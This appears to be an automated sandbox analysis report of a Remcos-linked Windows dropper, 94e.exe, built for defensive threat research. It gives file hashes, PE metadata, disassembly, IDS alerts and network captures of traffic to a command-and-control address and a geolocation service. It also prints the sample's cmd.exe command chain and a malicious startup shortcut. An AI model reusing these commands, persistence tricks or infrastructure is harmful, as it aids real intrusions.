                                    SSDEEP:3072:LZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3l5:LK5vPeDkjGgQaE/l5
                                    MD5:9B06EE62B4075EAD9252BCA0AB6B8E1F
                                    SHA1:C5A46DE8EBC0CF59B3E9D853A19D81E46B39DB8E
                                    SHA-256:59E51175F590B56CAA0FAE3C0AC954FBF640DA5CF5115E13ACDDCD3ABCCEAE58
                                    SHA-512:D29CC82CFA31D2E1180B6B0B45B3EDAF030B743E877468EE6CD4019EF24C893ACFAB92D9295CC5970D08CCBFD7F28D37CE82074EA24386A7260E58AEB4B82FF7
                                    Malicious:false
                                    Preview:..V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H..............a...WQ.P....7..<.I..t$...D.........d.........h.........P........D$.;F.t.P.....3.@_^..]....L$..N...3...U..V.u.;5t)M.........T)M........t.Q......T)M..... ...`)M...T)M.;5d)M.u....|.....8.u.N...5d)M...X)M.^...v.
                                    Process:C:\Users\user\Desktop\94e.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):79872
                                    Entropy (8bit):7.997367075027439
                                    Encrypted:true
                                    SSDEEP:1536:9uJYk3T028CTlAHsn6EG11bpfS2opiYP8nG2eO2Sr3MxHAbk2NQQTdyAk:9Qg280n011Nf1oIE8nGpO/r2udJTG
                                    MD5:6EC2D21CF20149100EAFE4E40FA64C02
                                    SHA1:E5A4642353BBEA58657E8DBDF86D6F44DAA8770D
                                    SHA-256:9DD82A22080A518BB655E69CFCAFBC0409E6D31CD7314476E781993811E2EC30
                                    SHA-512:4379014C90B7737A6A8BB0723653091BB717F99730D66AE1F63EE66677A9160C6BD9DC90EBB8D9D8C72BA56DE7300A379204E50EE84AD2DA04B27A94198EB9C0
                                    Malicious:false
                                    Preview:?..J.A.3....]....)....k&_X...b.E..,.T.x....Aj...F9..3..C.N...)..{.\....'c.O./.}*.....fP.f....R.c..D.\..|...3......j.&.+.p/...)..(T\.Q....h...Z..[(w...Tb.R*b]b.NLFgHK}.y.W`l.:.......!)g.>..../.s.md........l"/......O.....c>....>.]-..r.w>V@r..r..3oJ.Z.td...&..u.......c.........u......H...A.e.e2n+h.2^.7.r.w..)..Gi.....?..SJ.&..u..U.....R.q.O....a2.'#..1..%..N..*=.]..z.@.e...]..k.{I.g.\.].;.D;O.@mZy[. ..H.U.y../"q*...?.....F~...._5U....07T.y....L.9.....j.!.?......$!..z...y.xRj...A..P..F(.D...............~.k....,%:..5e. C..!.N.I.....e....m..).8.l.Y.z.s.p.......b.W2T.|.k>..H+......c-$?T.."g...d1y|c..../..x...^.........c.5.......DF....n....xY...R....%..i..j.xF.e.'{...s$...Y.......k0.....-..Z..p....Lk......@.Q.?.>.==..X......?...Z....m.....X....a.N..d]MT.AX..gG..~.G.j...P...d7L.e4...,ki!.\H.............3R..H.k...~=z....:......~s......'6....,C...#.Z..x4=\.......9...)U...R..+D.}..~.3&.l..c,T./....ox....].......7.Ke......s..k.....>8U.@,...T/
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):144384
                                    Entropy (8bit):6.712192729639709
                                    Encrypted:false
                                    SSDEEP:3072:oW2UDQWf05mjccBiqXvpgF4qv+32eOyKODOSpQSAU4C0:CUDtf0accB3gBmmLsiS+SAhC0
                                    MD5:8DB05BAC1C4AE27F79F7F2DB347B7C78
                                    SHA1:A14626D92A263F61D6263C68B99C9C145757ED2A
                                    SHA-256:BBD7E676F193BA52D8A37ACD1E586E69E6B498AEED8D35455141530AA8F61548
                                    SHA-512:6F8E9787FC3287D2953FFEB1014ADC76FBA466D3FCE0A34A636708C45844BE60403E25A45A627068BD60DB32F76262474E2CEA2E7E48171AA73E9A1C730367B6
                                    Malicious:false
                                    Preview:...........L....T$..L$..T$......z....|$.........D$..........|$.........|$..........3............L$..D$.....r...........3........j(.3Y....Y.N..P....N..H...;\$........D$..t$.P........j.........L$....................H.............D$ ...;.t.P.U....E..@..0...-.................;N.t..v..+.............t$..L$.Q...0.5.#M.....I.....J....L$ ...._^3.[..]...U.....U.3.S3.E.V3.CW.u.9B........M.3.}..E.#......M....}....M....M...P...8...j+Yj^...f;.Yj!Z.. ...f;.......f;.......f;E........F...V.E.......u.}......{......j@.M..?....U..E.P.E.Pj}X...\...YY..tN.u..4..!K.....YY..t.F..c|..c........H!K..u!.... K....M............_^[....2...2...U..QSVWf...U..M..;....u.2.6.M.V.G......f..t#..u.f;.t..M.P......E..0F.0..E.......f..t..._^[..U..U...<...V.........B..F..B..F..B..F....\...^]...U...(.E.S.M.3.V.u..M.M...M....E.....W.Q.jN[........x.f9X..]..}........e...>.A.G.}..>jO.....x..}._f9x..}.......R.E.PVQ.M..'X......<....E...jOZ.@....f9P...$....E..8@.......A..M...;............E..M.0.&....M.jN....N..E..u
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" >), ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):92
                                    Entropy (8bit):4.839128402679534
                                    Encrypted:false
                                    SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5iQRAcCG75SK:HRYF5yjowkn23iQRAcSK
                                    MD5:F2BF87E173456FDDB25858FC2076C4BE
                                    SHA1:8B74ED5C53C9CFDD3B9C44C71C8AD5092AE53FF0
                                    SHA-256:79354D98FA4033A9721D006DA98BB7AE327514EB950D21ED8DCF16FA2BDBCF5C
                                    SHA-512:932858A28435B9978AB482E20A05F6A91168B15D115AB510D46C5B149FC55E2A745B66A6BF4077DAF8E4F9C541F4BC46CB5913B97FE840C6FA837C92E2401395
                                    Malicious:true
                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GuardKey Solutions\SecureKey.js" ..
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.985524809121679
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:94e.exe
                                    File size:1'820'231 bytes
                                    MD5:e64509a606fef02334a4b20d3da84ecf
                                    SHA1:4277ab565325593bd91dea95976942f3b636747c
                                    SHA256:94e4256177777422e7ca3282075bb34480c9e235a1c5f3209918abfe1f341697
                                    SHA512:c7c5f8319ffb2a13cc424f8da11f0c0f794fb6496995d90a30222a9da71b882cffbf6d21343713d074cd7e1aaf3c2286998532cda50d77d6380395613a0f2317
                                    SSDEEP:24576:m+e9sK6m7r7RXyzS0MzK8Y82mTn1fLSfl/AQB/Wa5zZtur9THsm7xqEBvBDNis:pe9iG/dyuzHYW14ZAQBlZtur9THNtvj9
                                    TLSH:54853393AA0C9CC3DD838DB6A920666727F3FA5C6924D7075352C484F321D4B92627BF
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...r...B...8.....
                                    Icon Hash:e1dcece4c4e47c58
                                    Entrypoint:0x4038af
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                    Signature Valid:false
                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 04/05/2023 01:00:00 07/05/2026 00:59:59
                                    Subject Chain
                                    • CN=TeamViewer Germany GmbH, O=TeamViewer Germany GmbH, L=G\xf6ppingen, S=Baden-W\xfcrttemberg, C=DE
                                    Version:3
                                    Thumbprint MD5:0D637B42FF0AB3019673C4243305BD25
                                    Thumbprint SHA-1:777A41024CF413CCB49B3434565545C0D78D80E9
                                    Thumbprint SHA-256:3A0A9BD3CBF08E350DACBFCB54C53F00113D929DAD01AF4C9D5BFE37ACF9F352
                                    Serial:062EE3FD7CDC52097C1DA6AFA87C745E
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    push 00000020h
                                    xor ebp, ebp
                                    pop esi
                                    mov dword ptr [esp+18h], ebp
                                    mov dword ptr [esp+10h], 0040A268h
                                    mov dword ptr [esp+14h], ebp
                                    call dword ptr [00409030h]
                                    push 00008001h
                                    call dword ptr [004090B4h]
                                    push ebp
                                    call dword ptr [004092C0h]
                                    push 00000008h
                                    mov dword ptr [0047EB98h], eax
                                    call 00007F8F2D337E8Bh
                                    push ebp
                                    push 000002B4h
                                    mov dword ptr [0047EAB0h], eax
                                    lea eax, dword ptr [esp+38h]
                                    push eax
                                    push ebp
                                    push 0040A264h
                                    call dword ptr [00409184h]
                                    push 0040A24Ch
                                    push 00476AA0h
                                    call 00007F8F2D337B6Dh
                                    call dword ptr [004090B0h]
                                    push eax
                                    mov edi, 004CF0A0h
                                    push edi
                                    call 00007F8F2D337B5Bh
                                    push ebp
                                    call dword ptr [00409134h]
                                    cmp word ptr [004CF0A0h], 0022h
                                    mov dword ptr [0047EAB8h], eax
                                    mov eax, edi
                                    jne 00007F8F2D33545Ah
                                    push 00000022h
                                    pop esi
                                    mov eax, 004CF0A2h
                                    push esi
                                    push eax
                                    call 00007F8F2D337831h
                                    push eax
                                    call dword ptr [00409260h]
                                    mov esi, eax
                                    mov dword ptr [esp+1Ch], esi
                                    jmp 00007F8F2D3354E3h
                                    push 00000020h
                                    pop ebx
                                    cmp ax, bx
                                    jne 00007F8F2D33545Ah
                                    add esi, 02h
                                    cmp word ptr [esi], bx
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x80446.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1b97170x2f30
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1000000x804460x80600587813348164d2664e6647eb84ef392cFalse0.993720332278481data7.963310924450258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1810000xfd60x10001e2daffa57cfb45ab40da9bc854a30b0False0.569091796875data5.3301846876241425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1002680x7ba38PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9998124101543371
                                    RT_ICON0x17bca00x2a4cPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010158847432582
                                    RT_ICON0x17e6ec0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6741803278688525
                                    RT_ICON0x17f8140x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.774822695035461
                                    RT_DIALOG0x17fc7c0x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0x17fd7c0x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0x17fe980x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x17fef80x3edataEnglishUnited States0.8387096774193549
                                    RT_VERSION0x17ff380x238dataEnglishUnited States0.5264084507042254
                                    RT_MANIFEST0x1801700x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                    DLLImport
                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-23T16:21:09.127868+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449736101.99.94.642404TCP
                                    2024-12-23T16:21:11.706246+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449738178.237.33.5080TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 23, 2024 16:21:07.641341925 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:07.761212111 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:07.763930082 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:07.769572020 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:07.889550924 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.083507061 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.127867937 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:09.323457003 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.331868887 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:09.452661991 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.452744961 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:09.572583914 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.908715963 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:09.910046101 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:10.029872894 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:10.100733042 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:10.235138893 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:10.310678005 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:21:10.433490992 CET8049738178.237.33.50192.168.2.4
                                    Dec 23, 2024 16:21:10.433727980 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:21:10.433866024 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:21:10.553463936 CET8049738178.237.33.50192.168.2.4
                                    Dec 23, 2024 16:21:11.706156969 CET8049738178.237.33.50192.168.2.4
                                    Dec 23, 2024 16:21:11.706245899 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:21:11.717955112 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:11.839953899 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:12.707031965 CET8049738178.237.33.50192.168.2.4
                                    Dec 23, 2024 16:21:12.707228899 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:21:20.898519993 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:20.900192022 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:21.020350933 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:50.916796923 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:21:50.918275118 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:21:51.038085938 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:22:20.949567080 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:22:20.951179981 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:22:21.071006060 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:22:50.970892906 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:22:50.972347975 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:22:51.092086077 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:23:00.165658951 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:00.547907114 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:01.235416889 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:02.532344103 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:05.048093081 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:10.047943115 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:19.844839096 CET4973880192.168.2.4178.237.33.50
                                    Dec 23, 2024 16:23:21.012177944 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:23:21.014357090 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:23:21.136359930 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:23:51.060815096 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:23:51.062110901 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:23:51.182858944 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:24:21.080691099 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:24:21.081940889 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:24:21.201500893 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:24:51.125269890 CET240449736101.99.94.64192.168.2.4
                                    Dec 23, 2024 16:24:51.126400948 CET497362404192.168.2.4101.99.94.64
                                    Dec 23, 2024 16:24:51.246049881 CET240449736101.99.94.64192.168.2.4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 23, 2024 16:20:52.027507067 CET5864553192.168.2.41.1.1.1
                                    Dec 23, 2024 16:20:52.251633883 CET53586451.1.1.1192.168.2.4
                                    Dec 23, 2024 16:21:04.169832945 CET5863053192.168.2.41.1.1.1
                                    Dec 23, 2024 16:21:04.308515072 CET53586301.1.1.1192.168.2.4
                                    Dec 23, 2024 16:21:10.164005041 CET5841253192.168.2.41.1.1.1
                                    Dec 23, 2024 16:21:10.306775093 CET53584121.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 23, 2024 16:20:52.027507067 CET192.168.2.41.1.1.10xd13cStandard query (0)KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXWA (IP address)IN (0x0001)false
                                    Dec 23, 2024 16:21:04.169832945 CET192.168.2.41.1.1.10x5f2Standard query (0)KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXWA (IP address)IN (0x0001)false
                                    Dec 23, 2024 16:21:10.164005041 CET192.168.2.41.1.1.10x5ecfStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 23, 2024 16:20:52.251633883 CET1.1.1.1192.168.2.40xd13cName error (3)KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXWnonenoneA (IP address)IN (0x0001)false
                                    Dec 23, 2024 16:21:04.308515072 CET1.1.1.1192.168.2.40x5f2Name error (3)KPstIEdgjHZZFIeWPSSPTXW.KPstIEdgjHZZFIeWPSSPTXWnonenoneA (IP address)IN (0x0001)false
                                    Dec 23, 2024 16:21:10.306775093 CET1.1.1.1192.168.2.40x5ecfNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                    • geoplugin.net
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.449738178.237.33.50807848C:\Users\user\AppData\Local\Temp\159893\Held.com
                                    TimestampBytes transferredDirectionData
                                    Dec 23, 2024 16:21:10.433866024 CET71OUTGET /json.gp HTTP/1.1
                                    Host: geoplugin.net
                                    Cache-Control: no-cache
                                    Dec 23, 2024 16:21:11.706156969 CET1171INHTTP/1.1 200 OK
                                    date: Mon, 23 Dec 2024 15:21:11 GMT
                                    server: Apache
                                    content-length: 963
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                    Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:10:20:43
                                    Start date:23/12/2024
                                    Path:C:\Users\user\Desktop\94e.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\94e.exe"
                                    Imagebase:0x400000
                                    File size:1'820'231 bytes
                                    MD5 hash:E64509A606FEF02334A4B20D3DA84ECF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:10:20:43
                                    Start date:23/12/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c move Modes Modes.cmd & Modes.cmd
                                    Imagebase:0x240000
                                    File size:236'544 bytes
